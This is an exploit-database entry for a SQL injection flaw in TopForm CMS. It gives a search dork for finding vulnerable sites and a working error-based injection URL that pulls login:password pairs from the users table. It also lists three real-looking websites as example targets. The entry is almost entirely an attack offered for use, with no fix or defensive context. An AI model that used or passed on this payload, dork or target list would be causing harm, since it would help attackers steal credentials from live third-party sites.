TopForm CMS SQL Injection Vulnerability



EKU-ID: 1496 CVE: OSVDB-ID:
Author: faza02 Published: 2012-02-20 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


Title: TopForm CMS

	 Date:       17.01.2012
	 Author:     faza02
	 Vuln. type: SQL Injection
	 Dork:       inurl:"index.php?issue_id="
	 Vendor:     adminv.ru


Exploit: http://[site]/?issue_id=7&cat=2'+and+(select+1+from(select+count(*),concat((select+concat(login,0x3a,password)+from+users+limit+0,1),floor(Rand(0)*2))a+from+information_schema.tables+group+by+a)b)+--+

Example: http://bzhi.ru/?issue_id=7&cat=2'
	 http://www.mandrogi.ru/?issue_id=85'
	 http://lensvet.com/index.php?issue_id=25'